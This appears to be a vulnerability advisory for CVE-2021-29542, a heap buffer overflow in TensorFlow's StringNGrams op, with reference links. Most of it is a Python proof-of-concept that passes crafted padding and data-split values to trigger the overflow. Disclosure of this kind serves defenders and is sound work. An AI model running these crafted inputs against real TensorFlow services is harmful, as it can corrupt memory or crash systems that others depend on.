CVE-2021-29542: Heap buffer overflow in `StringNGrams`
(updated )
An attacker can cause a heap buffer overflow by passing crafted inputs to tf.raw_ops.StringNGrams
:
import tensorflow as tf
separator = b'\x02\x00'
ngram_widths = [7, 6, 11]
left_pad = b'\x7f\x7f\x7f\x7f\x7f'
right_pad = b'\x7f\x7f\x25\x5d\x53\x74'
pad_width = 50
preserve_short_sequences = True
l = ['', '', '', '', '', '', '', '', '', '', '']
data = tf.constant(l, shape=[11], dtype=tf.string)
l2 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 3]
data_splits = tf.constant(l2, shape=[116], dtype=tf.int64)
out = tf.raw_ops.StringNGrams(data=data,
data_splits=data_splits, separator=separator,
ngram_widths=ngram_widths, left_pad=left_pad,
right_pad=right_pad, pad_width=pad_width,
preserve_short_sequences=preserve_short_sequences)
References
- github.com/advisories/GHSA-4hrh-9vmp-2jgg
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-470.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-668.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-179.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/ba424dd8f16f7110eea526a8086f1a155f14f22b
- github.com/tensorflow/tensorflow/security/advisories/GHSA-4hrh-9vmp-2jgg
- nvd.nist.gov/vuln/detail/CVE-2021-29542
Detect and mitigate CVE-2021-29542 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →